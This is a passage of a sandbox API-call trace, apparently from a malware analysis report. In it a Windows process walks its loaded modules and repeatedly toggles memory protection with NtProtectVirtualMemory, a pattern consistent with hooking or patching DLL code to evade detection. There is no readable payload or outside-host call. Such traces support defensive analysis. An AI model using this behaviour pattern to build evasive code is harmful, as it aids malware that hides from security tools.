OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75621000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.699] GetCurrentProcess () returned 0xffffffff [0053.699] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x756211b0, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75621000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.700] GetCurrentProcess () returned 0xffffffff [0053.700] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x756211b0, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75621000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.700] GetCurrentProcess () returned 0xffffffff [0053.700] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x756211c4, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75621000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.700] GetCurrentProcess () returned 0xffffffff [0053.700] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x756211c4, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75621000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.701] GetCurrentProcess () returned 0xffffffff [0053.701] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x756211e0, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75621000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.701] GetCurrentProcess () returned 0xffffffff [0053.701] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x756211e0, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75621000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.701] Module32Next (hSnapshot=0x110, lpme=0x41f58c) returned 1 [0053.702] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x767c0154, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x767c0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.702] GetCurrentProcess () returned 0xffffffff [0053.702] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x767c0154, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x767c0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.702] GetCurrentProcess () returned 0xffffffff [0053.702] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x767c015c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x767c0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.703] GetCurrentProcess () returned 0xffffffff [0053.703] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x767c015c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x767c0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.703] GetCurrentProcess () returned 0xffffffff [0053.703] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x767c0160, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x767c0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.703] GetCurrentProcess () returned 0xffffffff [0053.703] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x767c0160, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x767c0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.703] GetCurrentProcess () returned 0xffffffff [0053.703] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x767c0164, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x767c0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.704] GetCurrentProcess () returned 0xffffffff [0053.704] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x767c0164, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x767c0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.704] GetCurrentProcess () returned 0xffffffff [0053.704] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x767c01c0, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x767c0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.704] GetCurrentProcess () returned 0xffffffff [0053.704] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x767c01c0, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x767c0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.704] GetCurrentProcess () returned 0xffffffff [0053.704] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x767c01d4, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x767c0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.705] GetCurrentProcess () returned 0xffffffff [0053.705] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x767c01d4, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x767c0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.705] GetCurrentProcess () returned 0xffffffff [0053.705] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x767c01e4, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x767c0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.705] GetCurrentProcess () returned 0xffffffff [0053.705] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x767c01e4, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x767c0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.705] GetCurrentProcess () returned 0xffffffff [0053.705] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x767c01f0, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x767c0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.705] GetCurrentProcess () returned 0xffffffff [0053.705] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x767c01f0, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x767c0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.706] GetCurrentProcess () returned 0xffffffff [0053.706] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x767c01f4, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x767c0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.706] GetCurrentProcess () returned 0xffffffff [0053.706] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x767c01f4, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x767c0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.706] GetCurrentProcess () returned 0xffffffff [0053.706] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x767c0220, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x767c0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.707] GetCurrentProcess () returned 0xffffffff [0053.707] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x767c0220, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x767c0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.707] Module32Next (hSnapshot=0x110, lpme=0x41f58c) returned 1 [0053.708] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75801080, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75801000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.708] GetCurrentProcess () returned 0xffffffff [0053.708] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75801080, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75801000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.708] GetCurrentProcess () returned 0xffffffff [0053.708] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x7580108c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75801000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.709] GetCurrentProcess () returned 0xffffffff [0053.709] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x7580108c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75801000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.709] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x758010ec, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75801000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.709] GetCurrentProcess () returned 0xffffffff [0053.709] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x758010ec, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75801000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.709] GetCurrentProcess () returned 0xffffffff [0053.709] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x758010f8, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75801000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.710] GetCurrentProcess () returned 0xffffffff [0053.710] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x758010f8, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75801000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.710] GetCurrentProcess () returned 0xffffffff [0053.710] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x758010fc, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75801000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.710] GetCurrentProcess () returned 0xffffffff [0053.710] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x758010fc, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75801000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.710] GetCurrentProcess () returned 0xffffffff [0053.710] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75801100, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75801000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.711] GetCurrentProcess () returned 0xffffffff [0053.711] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75801100, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75801000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.711] GetCurrentProcess () returned 0xffffffff [0053.711] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x7580110c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75801000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.711] GetCurrentProcess () returned 0xffffffff [0053.711] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x7580110c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75801000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.711] GetCurrentProcess () returned 0xffffffff [0053.711] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75801114, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75801000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.712] GetCurrentProcess () returned 0xffffffff [0053.712] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75801114, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75801000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.712] GetCurrentProcess () returned 0xffffffff [0053.712] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75801118, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75801000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.712] GetCurrentProcess () returned 0xffffffff [0053.712] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75801118, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75801000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.712] GetCurrentProcess () returned 0xffffffff [0053.712] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x7580116c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75801000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.713] GetCurrentProcess () returned 0xffffffff [0053.713] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x7580116c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75801000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.713] GetCurrentProcess () returned 0xffffffff [0053.713] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x758011a4, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75801000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.713] GetCurrentProcess () returned 0xffffffff [0053.713] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x758011a4, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75801000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.713] GetCurrentProcess () returned 0xffffffff [0053.713] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x758011cc, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75801000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.714] GetCurrentProcess () returned 0xffffffff [0053.714] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x758011cc, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75801000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.714] GetCurrentProcess () returned 0xffffffff [0053.714] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x758011f8, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75801000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.715] GetCurrentProcess () returned 0xffffffff [0053.715] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x758011f8, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75801000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.715] Module32Next (hSnapshot=0x110, lpme=0x41f58c) returned 1 [0053.716] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x755911b8, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75591000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.716] GetCurrentProcess () returned 0xffffffff [0053.716] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x755911b8, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75591000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.716] GetCurrentProcess () returned 0xffffffff [0053.716] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x755911bc, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75591000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.717] GetCurrentProcess () returned 0xffffffff [0053.717] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x755911bc, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75591000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.717] GetCurrentProcess () returned 0xffffffff [0053.717] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x755911c0, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75591000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.717] GetCurrentProcess () returned 0xffffffff [0053.717] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x755911c0, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75591000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.717] GetCurrentProcess () returned 0xffffffff [0053.717] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x755911c4, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75591000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.717] GetCurrentProcess () returned 0xffffffff [0053.717] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x755911c4, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75591000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.718] GetCurrentProcess () returned 0xffffffff [0053.718] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x755911ec, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75591000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.718] GetCurrentProcess () returned 0xffffffff [0053.718] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x755911ec, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75591000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.718] GetCurrentProcess () returned 0xffffffff [0053.718] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x755911f0, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75591000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.718] GetCurrentProcess () returned 0xffffffff [0053.718] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x755911f0, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75591000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.718] GetCurrentProcess () returned 0xffffffff [0053.719] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75591204, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75591000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.719] GetCurrentProcess () returned 0xffffffff [0053.719] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75591204, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75591000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.719] GetCurrentProcess () returned 0xffffffff [0053.719] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75591210, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75591000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.719] GetCurrentProcess () returned 0xffffffff [0053.719] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75591210, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75591000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.719] GetCurrentProcess () returned 0xffffffff [0053.719] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75591250, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75591000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.720] GetCurrentProcess () returned 0xffffffff [0053.720] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75591250, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75591000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.720] GetCurrentProcess () returned 0xffffffff [0053.720] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x755912c0, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75591000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.720] GetCurrentProcess () returned 0xffffffff [0053.720] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x755912c0, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75591000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.720] GetCurrentProcess () returned 0xffffffff [0053.720] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x755912c4, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75591000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.721] GetCurrentProcess () returned 0xffffffff [0053.721] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x755912c4, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75591000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.721] GetCurrentProcess () returned 0xffffffff [0053.721] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, 